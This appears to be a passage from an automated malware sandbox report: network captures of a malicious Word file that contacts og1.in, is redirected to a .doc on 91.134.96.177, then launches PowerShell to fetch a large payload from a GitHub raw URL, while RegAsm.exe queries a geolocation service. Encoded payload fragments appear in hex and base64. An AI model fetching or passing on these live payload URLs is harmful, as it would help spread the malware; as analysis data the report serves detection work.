                                                                                                                                                                                                Data Ascii: o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcO
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270373106 CEST1236INData Raw: 74 7a 49 37 73 78 4f 51 73 7a 42 36 45 76 4f 62 72 44 6f 36 55 70 4f 4d 71 7a 57 36 4d 56 4f 47 6e 54 74 35 55 61 4f 64 6d 44 6a 35 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a 4e 4a 57 54 64 31 67 56 4e 68 51 7a
                                                                                                                                                                                                Data Ascii: tzI7sxOQszB6EvObrDo6UpOMqzW6MVOGnTt5UaOdmDj5wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270385027 CEST1236INData Raw: 77 39 4d 4c 50 54 71 7a 38 35 4d 53 4f 54 69 7a 38 32 4d 65 4e 54 4b 7a 41 79 4d 50 4d 7a 41 79 67 75 4d 58 4c 6a 6f 79 73 70 4d 75 4a 7a 5a 78 34 61 4d 79 45 6a 48 77 49 43 41 41 45 41 6b 41 51 41 67 41 41 41 41 2f 63 39 50 6e 2b 6a 64 2f 59 53
                                                                                                                                                                                                Data Ascii: w9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjHwICAAEAkAQAgAAAA/c9Pn+jd/YSPzxzS4kIOlUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6wcLMFCAAAgDAEAHAAAgP77D8+4QPk3ju90YP71zB8s0OzvTy7M6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270395994 CEST1000INData Raw: 52 44 51 30 77 44 4e 34 51 44 4e 30 41 7a 4d 6e 4f 44 4d 7a 77 79 4d 6f 4d 44 4a 7a 41 79 4d 63 4d 44 47 7a 51 68 4d 2f 4a 44 43 79 51 67 4d 41 45 44 2f 78 67 66 4d 30 48 44 38 78 77 65 4d 6a 42 41 41 41 51 47 41 44 41 4e 41 41 41 77 50 50 2f 54
                                                                                                                                                                                                Data Ascii: RDQ0wDN4QDN0AzMnODMzwyMoMDJzAyMcMDGzQhM/JDCyQgMAED/xgfM0HD8xweMjBAAAQGADANAAAwPP/Tv/s5PJ+Ta/QlP30je2gcNMND0zYiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ
                                                                                                                                                                                                Sep 30, 2024 16:24:36.275211096 CEST1236INData Raw: 44 44 76 77 59 4c 4d 77 43 6a 71 77 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a
                                                                                                                                                                                                Data Ascii: DDvwYLMwCjqwUKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.2249176178.237.33.50804076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 30, 2024 16:24:38.658246994 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                Host: geoplugin.net
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Sep 30, 2024 16:24:39.279786110 CEST1170INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Mon, 30 Sep 2024 14:24:39 GMT
                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                content-length: 962
                                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                                cache-control: public, max-age=300
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                                                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.2249163172.67.216.2444433272C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:08 UTC128OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                                User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                                                                                Host: og1.in
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-30 14:24:09 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:09 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                allow: GET,HEAD
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzHWC%2BLoa340TJe1A2B1T37rFcr%2FhZsmzHvF1DxGRBv4pN7povbrZoI%2BozEzbR2Ytv1IVIBlDUtqJl3KnMF6B9jxzPg6Sj99oQ8d7aCaxak20kCvzoz8j4g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4dff5eee6c32c-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                2024-09-30 14:24:09 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                                                                                                                Data Ascii: 8GET,HEAD
                                                                                                                                                                                                2024-09-30 14:24:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.2249164104.21.78.544433272C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:11 UTC113OUTHEAD /S7UYq0 HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                Host: og1.in
                                                                                                                                                                                                2024-09-30 14:24:11 UTC947INHTTP/1.1 302 Found
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:11 GMT
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                vary: Accept
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xleqArMqGoyUBifzkGc4gTRfgCmmSU8AaHaa%2F%2F3xv8c5udWIIFJ5Boef13HxfPCBJVaF9dabS%2F7Wrw%2B0fSUFTIot7uG7h7wQIOZ3LMLj8GVCChdMsk7bb4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e0055dab0f37-EWR


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                2192.168.2.2249165172.67.216.244443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:15 UTC123OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                                                                translate: f
                                                                                                                                                                                                Host: og1.in
                                                                                                                                                                                                2024-09-30 14:24:17 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:17 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                allow: GET,HEAD
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bo6d8Zp%2BBUu45VaUa3p%2FfOWUV3FQ7u96DQ2WqreihGmq5bLlQXgPUgzyUs%2FO1IrlXBuxPiZwN7SYVOctnBxYhn1ZWNg7eOTVF3eUaR3D0RtF3kEEcA1kgFw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e02449a64344-EWR
                                                                                                                                                                                                2024-09-30 14:24:17 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                                                                                                                                                Data Ascii: 8GET,HEAD
                                                                                                                                                                                                2024-09-30 14:24:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                3192.168.2.2249166104.21.78.54443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:18 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 67 31 2e 69 6e 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: og1.in
                                                                                                                                                                                                2024-09-30 14:24:18 UTC798INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:18 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                content-security-policy: default-src 'none'
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEDnYP2a2eWLiLrKs9YJnu3mWIgCiF2subT99aKzhKPzYf0hTkAp%2BDWePLXPVtmBYN5XRFiEPyhP56mSGe2KFWViHcbBotu8ZICa0e8yFyOOA2PbwqP5xUk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e0316c2141cd-EWR
                                                                                                                                                                                                2024-09-30 14:24:18 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                                                                                                                                                2024-09-30 14:24:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                4192.168.2.2249167104.21.78.54443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:19 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 67 31 2e 69 6e 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: og1.in
                                                                                                                                                                                                2024-09-30 14:24:20 UTC798INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:20 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                content-security-policy: default-src 'none'
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NRKoUHUfmwUlOfnRKK1g5ZJQMjYMlATd0rHuiKHyLok3qZv84ugmaFM%2BKhKwZ9DBqhGYoKLtobw1uLfGvPHk7T3nqN3LheJooVVDhypdxPHxk%2FckOexKUQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e039ca8c431f-EWR
                                                                                                                                                                                                2024-09-30 14:24:20 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                                                                                                                                                2024-09-30 14:24:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.2249168172.67.216.2444433272C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:20 UTC343OUTGET /S7UYq0 HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Host: og1.in
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-30 14:24:21 UTC935INHTTP/1.1 302 Found
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:21 GMT
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                vary: Accept
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 0
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pw1zTNOP1giK2dA7oP3Nly%2FoaOfBE7g4K2wa8jx7cFk8e8lz%2FOM7MNBNGrh%2FALwUJvEMxZwoRCXRoPyYn7tw09NgWhC7bmVZrAHrtPgWZBN%2BRkOUaJ3oVgc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e0426dad32e4-EWR
                                                                                                                                                                                                2024-09-30 14:24:21 UTC196INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 39 31 2e 31 33 34 2e 39 36 2e 31 37 37 2f 38 30 2f 75 63 2f 73 65 65 74 68 65 64 6f 6d 61 69 6e 64 73 6b 69 6c 6c 74 65 63 68 6e 6f 6c 6f 67 79 77 68 69 63 68 63 72 65 61 74 65 64 6e 69 63 65 70 65 72 73 6f 6e 65 6e 74 69 72 65 6c 69 66 65 74 6f 67 65 74 62 6d 65 62 61 63 6b 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 69 74 68 69 63 68 68 6f 6e 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 77 61 6e 74 6f 62 65 5f 5f 5f 5f 5f 5f 73 65 69 73 63 75 74 65 62 61 62 79 67 69 72 6c 65 76 65 72 2e 64 6f 63
                                                                                                                                                                                                Data Ascii: Found. Redirecting to http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.2249170172.67.216.2444433272C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:23 UTC132OUTHEAD /S7UYq0 HTTP/1.1
                                                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                Host: og1.in
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-30 14:24:24 UTC943INHTTP/1.1 302 Found
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:24 GMT
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
                                                                                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                vary: Accept
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBqwUmz3kwUh2xdYdtnIUwHkdj7ZhmTIQFwhKqs8y6fYYDZHYXEqTVAoYi%2FF2xTGstgYi6BcQxiLOb%2FRCij68cbLxXZ1TMnMXQ4z8wV1tNZwcy1DWx9OM2A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e051cbf31780-EWR


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.2249172185.199.109.1334433952C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-30 14:24:33 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-30 14:24:33 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 2935468
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 482C:31934A:562630:5C3669:66FAB4A0
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:33 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1727706273.273986,VS0,VE137
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: 7ebd9e96ea824740a6bddda325def95fa166dfa5
                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 14:29:33 GMT
                                                                                                                                                                                                Source-Age: 0
